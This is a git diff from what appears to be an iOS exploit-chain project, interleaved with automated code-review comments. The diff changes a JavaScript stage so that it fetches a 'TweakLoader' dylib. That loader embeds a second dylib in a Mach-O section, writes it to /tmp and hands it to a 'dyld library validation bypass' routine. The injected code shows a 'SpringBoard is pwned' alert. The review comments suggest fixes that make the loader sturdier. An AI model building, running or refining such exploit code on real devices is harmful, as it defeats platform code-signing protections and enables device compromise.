diff --git a/Stage3_VariantB.js b/Stage3_VariantB.js
index e529d42..0ce577c 100644
--- a/Stage3_VariantB.js
+++ b/Stage3_VariantB.js
@@ -1161,7 +1161,7 @@ function YA() {/* Original: YA → resolveSymbols */
 // Fetch a single file as ArrayBuffer
 fetchBin(url) {
 // Override entry2_type0x0f.dylib
- url = url.replace(/\/entry2_type0x0f.dylib$/g, "/../../SpringBoardTweak/.theos/obj/arm64" + (platformModule.platformState.hasPAC?"e":"") + "/SpringBoardTweak.dylib");
+ url = url.replace(/\/entry2_type0x0f.dylib$/g, "/../../TweakLoader/.theos/obj/arm64" + (platformModule.platformState.hasPAC?"e":"") + "/TweakLoader.dylib");
 window.log("Downloading " + url);
 return new Promise((resolve, reject) => {
diff --git a/SpringBoardTweak/.gitignore b/TweakLoader/.gitignore
similarity index 100%
rename from SpringBoardTweak/.gitignore
rename to TweakLoader/.gitignore
diff --git a/TweakLoader/Makefile b/TweakLoader/Makefile
new file mode 100644
index 0000000..98687b0
--- /dev/null
+++ b/TweakLoader/Makefile
@@ -0,0 +1,18 @@
+TARGET := iphone:clang:latest:15.0
+ARCHS = arm64 arm64e
+FINALPACKAGE = 1
+STRIP = 0
+GO_EASY_ON_ME = 1
+
+include $(THEOS)/makefiles/common.mk
+
+SUBPROJECTS += SpringBoardTweak
+include $(THEOS_MAKE_PATH)/aggregate.mk
+
+LIBRARY_NAME = TweakLoader
+TweakLoader_FILES = TweakLoader.m lv_bypass.c
+TweakLoader_CFLAGS = -fno-objc-arc
+TweakLoader_LDFLAGS = -sectcreate __TEXT __SBTweak $(THEOS_OBJ_DIR)/SpringBoardTweak.dylib
+TweakLoader_INSTALL_PATH = /usr/local/lib
+
+include $(THEOS_MAKE_PATH)/library.mk
diff --git a/SpringBoardTweak/Makefile b/TweakLoader/SpringBoardTweak/Makefile
similarity index 72%
rename from SpringBoardTweak/Makefile
rename to TweakLoader/SpringBoardTweak/Makefile
index 63e7c02..9ba5b8d 100644
--- a/SpringBoardTweak/Makefile
+++ b/TweakLoader/SpringBoardTweak/Makefile
@@ -8,8 +8,8 @@ include $(THEOS)/makefiles/common.mk
 LIBRARY_NAME = SpringBoardTweak
-SpringBoardTweak_FILES = SpringBoardTweak.m lv_bypass.c
-SpringBoardTweak_CFLAGS = -fno-objc-arc
+SpringBoardTweak_FILES = SpringBoardTweak.m
+SpringBoardTweak_CFLAGS = -fobjc-arc
 SpringBoardTweak_INSTALL_PATH = /usr/local/lib
 include $(THEOS_MAKE_PATH)/library.mk
diff --git a/TweakLoader/SpringBoardTweak/SpringBoardTweak.m b/TweakLoader/SpringBoardTweak/SpringBoardTweak.m
new file mode 100644
index 0000000..2509e4b
--- /dev/null
+++ b/TweakLoader/SpringBoardTweak/SpringBoardTweak.m
@@ -0,0 +1,15 @@
+@import UIKit;
+
+__attribute__((constructor)) static void init() {
+ dispatch_async(dispatch_get_main_queue(), ^{
+ UIAlertController *alert = [UIAlertController alertControllerWithTitle:@"Coruna" message:@"SpringBoard is pwned" preferredStyle:UIAlertControllerStyleAlert];
+ [alert addAction:[UIAlertAction actionWithTitle:@"Install TrollHelper (ETA SON)" style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
+
+ }]];
+ [alert addAction:[UIAlertAction actionWithTitle:@"Respring" style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
+ exit(0);
+ }]];
+ [alert addAction:[UIAlertAction actionWithTitle:@"OK" style:UIAlertActionStyleDefault handler:nil]];
+ [[UIApplication sharedApplication].keyWindow.rootViewController presentViewController:alert animated:YES completion:nil];
+ });
+}
diff --git a/SpringBoardTweak/SpringBoardTweak.m b/TweakLoader/TweakLoader.m
similarity index 51%
rename from SpringBoardTweak/SpringBoardTweak.m
rename to TweakLoader/TweakLoader.m
index f37f834..ab7e8a3 100644
--- a/SpringBoardTweak/SpringBoardTweak.m
+++ b/TweakLoader/TweakLoader.m
@@ -1,6 +1,5 @@
 @import Darwin;
 @import MachO;
-@import UIKit;
 #include /* _mh_dylib_header */
 // Function pointers
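Review bot: In the new SpringBoardTweak.m the "Install TrollHelper (ETA SON)" action carries an empty handler block, so the button does nothing but dismiss the alert; either pass `handler:nil` as the OK action does or put `// TODO: not implemented yet` inside the block so the stub is not mistaken for finished code. `[UIApplication sharedApplication].keyWindow` is deprecated since iOS 13 while the Makefile targets 15.0, and if `rootViewController` is nil when the constructor's main-queue block runs, `presentViewController:` is sent to nil and the alert silently never appears, so that branch deserves at least a comment. `exit(0)` in the Respring handler terminates the host process without cleanup; a one-line comment stating that this is the intended way to trigger the respring would make the intent explicit. Minor style: the C definition `static void init()` should be `static void init(void)`.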
@@ -8,7 +7,8 @@ extern pthread_t pthread_main_thread_np(void);
 extern void _pthread_set_self(pthread_t p);
 void (*_abort)(void);
 int (*_close)(int);
-void * (*_dlsym)(void *, const char *);
+void* (*_dlsym)(void *, const char *);
+uint8_t* (*_getsectiondata)(const struct mach_header_64 *, const char *, const char *, unsigned long *);
 thread_t (*_mach_thread_self)(void);
 int (*_open)(const char *, int, ...);
 void (*__pthread_set_self)(pthread_t p);
@@ -17,45 +17,17 @@ int (*_strncmp)(const char *s1, const char *s2, size_t n);
 kern_return_t (*_thread_terminate)(mach_port_t);
 int (*_write)(int, const void *, size_t);
-int shellcode_init(void * (*_dlsym)(void* handle, const char* symbol), const char *next_stage_dylib_path);
+int dyld_lv_bypass_init(void * (*_dlsym)(void* handle, const char* symbol), const char *next_stage_dylib_path);
-static uintptr_t _get_text_vmaddr(const struct mach_header_64 *mh) {
- struct load_command *lc = (void*)((uintptr_t)mh + sizeof(struct mach_header_64));
- for (uint32_t i = 0; i < mh->ncmds; i++, lc = (void*)((uint8_t*)lc + lc->cmdsize)) {
- if (lc->cmd != LC_SEGMENT_64) continue;
- struct segment_command_64 *seg = (void*)lc;
- if (_strncmp(seg->segname, "__TEXT", 6) == 0)
- return seg->vmaddr;
- }
- return 0;
-}
-static size_t macho_size_from_header(const struct mach_header_64 *mh) {
- uintptr_t base = (uintptr_t)mh;
- uintptr_t text_vm = _get_text_vmaddr(mh);
- uintptr_t slide = base - text_vm; // ASLR slide
-
- struct load_command *lc = (void*)(base + sizeof(struct mach_header_64));
- for (uint32_t i = 0; i < mh->ncmds; i++, lc = (void*)((uint8_t*)lc + lc->cmdsize)) {
- if (lc->cmd != LC_SEGMENT_64) continue;
- struct segment_command_64 *seg = (void*)lc;
- if (_strncmp(seg->segname, "__LINKEDIT", 10) != 0) continue;
-
- // vmaddr + slide = actual mapped address of __LINKEDIT
- // end = that + vmsize
- return (seg->vmaddr + slide + seg->vmsize) - base;
- }
-
- return 0;
-}
-
-const char *save_myself(void) {
- const char *path = "/tmp/SpringBoardTweak.dylib";
- const struct mach_header_64 *header = (struct mach_header_64 *)&_mh_dylib_header;
- size_t size = macho_size_from_header(header);
- int fd = _open(path, O_RDWR | O_CREAT | O_TRUNC, 0755);
- if (fd < 0) _abort();
+const char *save_actual_dylib(void) {
+ const char *path = "/tmp/actual.dylib";
+ int fd = _open(path, O_CREAT | O_WRONLY | O_TRUNC, 0644);
- if (_write(fd, header, size) != size) {
+ // -sectcreate __TEXT __actual_dylib
+
+ size_t dylib_size = 0;
+ const char *dylib = (const char *)_getsectiondata((struct mach_header_64 *)&_mh_dylib_header, "__TEXT", "__SBTweak", &dylib_size);
+ if (_write(fd, dylib, dylib_size) != dylib_size) {
 _abort();
 }
 _close(fd);
@@ -85,6 +57,7 @@ int last(void) {
 _abort = _dlsym(RTLD_DEFAULT, "abort");
 _close = _dlsym(RTLD_DEFAULT, "close");
+ _getsectiondata = _dlsym(RTLD_DEFAULT, "getsectiondata");
 _mach_thread_self = _dlsym(RTLD_DEFAULT, "mach_thread_self");
 _open = _dlsym(RTLD_DEFAULT, "open");
 _strncmp = _dlsym(RTLD_DEFAULT, "strncmp");
@@ -92,8 +65,8 @@ int last(void) {
 _write = _dlsym(RTLD_DEFAULT, "write");
 // setup dyld validation bypass
- const char *path = save_myself();
- shellcode_init(_dlsym, path);
+ const char *path = save_actual_dylib();
+ dyld_lv_bypass_init(_dlsym, path);
 // should not return
 _thread_terminate(_mach_thread_self());
diff --git a/SpringBoardTweak/control b/TweakLoader/control
similarity index 72%
rename from SpringBoardTweak/control
rename to TweakLoader/control
index a77d6a9..a008b81 100644
--- a/SpringBoardTweak/control
+++ b/TweakLoader/control
@@ -1,5 +1,5 @@
-Package: com.yourcompany.springboardtweak
-Name: SpringBoardTweak
+Package: com.yourcompany.TweakLoader
+Name: TweakLoader
 Version: 0.0.1
 Architecture: iphoneos-arm
 Description: An awesome library of some sort!!
diff --git a/SpringBoardTweak/lv_bypass.c b/TweakLoader/lv_bypass.c
similarity index 99%
rename from SpringBoardTweak/lv_bypass.c
rename to TweakLoader/lv_bypass.c
index 20ffd3f..2a5673f 100644
--- a/SpringBoardTweak/lv_bypass.c
+++ b/TweakLoader/lv_bypass.c
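Review bot: The comment `// -sectcreate __TEXT __actual_dylib` above the `_getsectiondata` call in save_actual_dylib names a section that matches neither the `"__SBTweak"` section name actually passed nor the `-sectcreate __TEXT __SBTweak` flag in TweakLoader/Makefile; change it to `// embedded by -sectcreate __TEXT __SBTweak in TweakLoader/Makefile` so the two stay in sync. `_getsectiondata` returns NULL and leaves `dylib_size` at 0 when that section is absent (for example a build without the linker flag); a 0-byte `_write` then succeeds and an empty file is handed on, so `if (!dylib || dylib_size == 0) _abort();` before the write would fail loudly instead of silently. The earlier `if (fd < 0) _abort();` after `_open` was also dropped in this hunk; without it a failed open is only caught indirectly when `_write` on fd -1 returns -1, and `_close(fd)` is skipped. save_actual_dylib continues past the hunk after `_close(fd);`.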
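Review bot: `_strncmp = _dlsym(RTLD_DEFAULT, "strncmp");` is still resolved in last() although this commit removed its only visible callers, `_get_text_vmaddr` and `macho_size_from_header`; unless `_strncmp` is referenced elsewhere in TweakLoader.m outside the hunks shown, the function pointer, its declaration and this `_dlsym` line are dead and should be removed together. If it is kept deliberately, a short comment on the declaration saying what still uses it would avoid the question recurring. The body of last() extends past this hunk on both sides.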
@@ -34,7 +34,7 @@ static mach_port_t _mach_task_self_;
 kern_return_t builtin_vm_protect(mach_port_name_t task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_max, vm_prot_t new_prot);
 static void init_bypassDyldLibValidation(void);
-int shellcode_init(void * (*_dlsym)(void* handle, const char* symbol),
+int dyld_lv_bypass_init(void * (*_dlsym)(void* handle, const char* symbol),
 const char *next_stage_dylib_path) {
 _printf = _dlsym(RTLD_DEFAULT, "printf");